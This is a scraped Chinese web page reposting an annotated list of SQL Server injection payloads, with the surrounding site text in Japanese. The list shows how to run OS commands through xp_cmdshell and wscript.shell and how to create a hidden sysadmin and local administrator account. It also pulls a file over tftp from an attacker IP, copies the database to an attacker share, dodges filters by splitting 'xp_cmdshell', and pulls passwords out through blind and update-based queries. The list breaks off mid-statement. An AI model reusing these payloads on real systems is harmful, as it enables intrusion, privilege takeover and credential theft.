常用SQL注射语句解析（3）_MySQL-mysql チュートリアル-php.cn

ホームページ

データベース

mysql チュートリアル

常用SQL注射语句解析（3）_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 01:51 PM

test

bitsCN.com

aths(path)

　　values(@test)--

　　;use ku1;--

　　;create table cmd (str image);-- 建立image类型的表cmd

　　存在xp_cmdshell的测试过程：

　　;exec master..xp_cmdshell 'dir'

　　;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号

　　;exec master.dbo.sp_password null,jiaoniang$,1866574;--

　　;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

　　;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:*

　　/times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

　　;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$

　　/add';--

　　exec master..xp_servicecontrol 'start', 'schedule' 启动服务

　　exec master..xp_servicecontrol 'start', 'server'

　　; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

　　SP_OAMETHOD @shell,'run',null, 'C：/WINNT/system32/cmd.exe /c net user

　　jiaoniang$ 1866574 /add'

　　;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

　　SP_OAMETHOD @shell,'run',null, 'C：/WINNT/system32/cmd.exe /c net

　　localgroup administrators jiaoniang$ /add'

　　'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件

　　;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'

　　;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:/'

　　;declare @a;set @a=db_name();backup database @a to

　　disk='你的IP你的共享目录bak.dat'

　　如果被限制则可以。

　　select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec

　　master.dbo.sp_addlogin hax')

　　查询构造：

　　Select * FROM news Where id=... AND topic=... AND .....

　　admin'and 1=(select count(*) from [user] where username='victim' and

　　right(left(userpass,01),1)='1') and userpass '

　　select 123;--

　　;use master;--

　　:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。

　　and 1(select count(email) from [user]);--

　　;update [users] set email=(select top 1 name from sysobjects where

　　xtype='u' and status>0) where name='ffff';--

　　;update [users] set email=(select top 1 id from sysobjects where xtype='u'

　　and name='ad') where name='ffff';--

　　';update [users] set email=(select top 1 name from sysobjects where

　　xtype='u' and id>581577110) where name='ffff';--

　　';update [users] set email=(select top 1 count(id) from password) where

　　name='ffff';--

　　';update [users] set email=(select top 1 pwd from password where id=2)

　　where name='ffff';--

　　';update [users] set email=(select top 1 name from password where id=2)

　　where name='ffff';--

　　上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

　　通过查看ffff的用户资料可得第一个用表叫ad

　　然后根据表名ad得到这个表的ID 得到第二个表的名字

　　insert into users values( 666,

　　char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

　　char(0x63)+char(0x68)+char(0x72)+c

bitsCN.com

このウェブサイトの声明

この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

脱衣画像を無料で

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

神レベルのコード編集ソフト（SublimeText3）

ホットトピック

Gmailメールのログイン入り口はどこですか？

7321

Java チュートリアル

1625

CakePHP チュートリアル

1349

Laravel チュートリアル

1261

PHP チュートリアル

1209

Related knowledge

Huawei Watch GT 5スマートウォッチが新機能を追加してアップデートされる Oct 03, 2024 am 06:25 AM

ファーウェイは、Watch GT 5 および Watch GT 5 Pro スマートウォッチ用のソフトウェアバージョン 5.0.0.100(C00M01) をグローバルに展開しています。これら 2 つのスマートウォッチは最近ヨーロッパで発売され、標準モデルが同社の最も安価なモデルとして登場しました。このハーモニー

鉄拳のカーネル・サンダースの夢をKFCが揚げた Oct 02, 2024 am 06:07 AM

『鉄拳』シリーズのディレクターである原田勝弘氏は、かつて真剣にカーネル・サンダースを象徴的な格闘ゲームに登場させようとした。 TheGamerとのインタビューで原田氏は、このアイデアを日本KFCに売り込み、ファストフード界のレジェンドをGとして追加したいと考えていたことを明かした。

初見：次期 Anker Zolo 4 ポート 140W ディスプレイ付き充電器の開封ビデオが流出 Oct 01, 2024 am 06:32 AM

2024年9月初め、AnkerのZolo 140W充電器がリークされました。これは同社初のディスプレイ付き壁掛け充電器だったため、大きな話題になりました。 YouTube の Xiao Li TV からの新しい開封ビデオでは、この製品を直接見ることができます。

Samsung Galaxy Z Fold Special Edition、競合する名前が浮上、10月下旬に発売されることが判明 Oct 01, 2024 am 06:21 AM

サムスンの待望の折りたたみ式「スペシャルエディション」の発売には、また新たな展開が加わった。ここ数週間、いわゆる Galaxy Z Fold Special Edition に関する噂はかなり静かになりました。代わりに、焦点はGalaxy S25シリーズに移りました。

HyperOS を搭載した新しい Xiaomi Mijia グラフェンオイルヒーターが到着 Oct 02, 2024 pm 09:02 PM

Xiaomiは間もなくMijiaグラフェンオイルヒーターを中国で発売する予定です。同社は最近、Youpin プラットフォームでホストされるスマートホーム製品のクラウドファンディングキャンペーンを実施し、成功を収めました。ページによると、デバイスはすでに出荷され始めています

Garmin、新しいアップデートにより複数のスマートウォッチ向けの Adventure Racing アクティビティの改善をリリース Oct 01, 2024 am 06:40 AM

Garmin は、最新のハイエンドスマートウォッチの新しい安定したアップデートのセットで月末を迎えます。要約すると、同社は Enduro 3、Fenix E、および Fenix 8 のバッテリー消耗の多さに対処するためにシステムソフトウェア 11.64 をリリースしました (Amazon で現在 1,099.99 ドル)。